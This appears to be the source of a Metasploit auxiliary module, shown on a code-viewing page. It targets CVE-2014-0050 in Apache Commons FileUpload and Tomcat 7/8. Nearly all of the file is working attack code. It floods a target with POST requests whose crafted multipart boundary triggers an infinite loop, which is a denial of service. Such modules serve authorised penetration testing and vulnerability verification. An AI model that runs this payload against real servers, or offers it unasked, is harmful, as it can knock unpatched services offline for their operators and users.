Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
13
      'Description'     => %q{
14
        This module triggers an infinite loop in Apache Commons FileUpload 1.0
15
        through 1.3 via a specially crafted Content-Type header.
16
        Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
17
        mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
18
        and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
19
        uses Commons FileUpload as part of the Manager application.
20
       },
21
       'Author'         =>
22
         [
23
           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
24
           'ribeirux' # metasploit module
25
         ],
26
       'License'        => MSF_LICENSE,
27
       'References'     =>
28
         [
29
           ['CVE', '2014-0050'],
30
           ['URL', 'https://tomcat.apache.org/security-8.html'],
31
           ['URL', 'https://tomcat.apache.org/security-7.html']
32
         ],
33
        'DisclosureDate' => '2014-02-06'
34
      ))
35

36
      register_options(
37
        [
38
          Opt::RPORT(8080),
39
          OptString.new('TARGETURI', [ true,  "The request URI", '/']),
40
          OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
41
        ])
42
  end
43

44
  def run
45
    boundary = "0"*4092
46
    opts = {
47
      'method'         => "POST",
48
      'uri'            => normalize_uri(target_uri.to_s),
49
      'ctype'          => "multipart/form-data; boundary=#{boundary}",
50
      'data'           => "#{boundary}00000",
51
      'headers' => {
52
        'Accept' => '*/*'
53
      }
54
    }
55

56
    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
57
    # This should be rewritten with 1.upto() or Enumerable#each or
58
    # something
59
    for x in 1..datastore['RLIMIT']
60
      print_status("Sending request #{x} to #{peer}")
61
      begin
62
        c = connect
63
        r = c.request_cgi(opts)
64
        c.send_request(r)
65
        # Don't wait for a response
66
      rescue ::Rex::ConnectionError => exception
67
        print_error("Unable to connect: '#{exception.message}'")
68
        return
69
      ensure
70
        disconnect(c) if c
71
      end
72
    end
73
  end
74
end
75

76

77